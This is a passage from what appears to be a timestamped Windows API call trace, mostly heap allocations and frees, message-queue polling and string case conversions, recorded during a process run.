lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0253.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0253.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0253.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0253.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0253.711] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0253.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0253.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0253.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0253.711] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0253.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0253.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0253.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0253.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0253.712] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0253.712] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0253.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0253.712] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0253.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0253.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0253.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0253.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.713] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0253.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0253.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0253.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0253.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0253.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0253.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0253.713] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0253.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0253.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0253.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0253.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0253.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0253.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0253.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0253.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0253.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0253.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0253.714] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0253.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0253.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0253.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0253.714] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0253.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0253.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0253.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0253.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0253.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0253.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0253.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0253.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0253.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0253.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0253.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0253.715] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0253.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0253.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0253.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0253.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0253.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0253.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0253.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0253.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0253.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0253.716] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0253.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0253.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0253.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0253.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0253.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0253.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0253.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0253.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0253.717] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.717] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0253.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.718] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.718] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0253.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0253.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.718] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0253.718] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0253.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0253.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0253.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0253.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0253.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0253.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0253.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0253.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0253.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0253.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0253.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0253.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0253.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0253.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0253.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0253.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0253.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0253.722] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 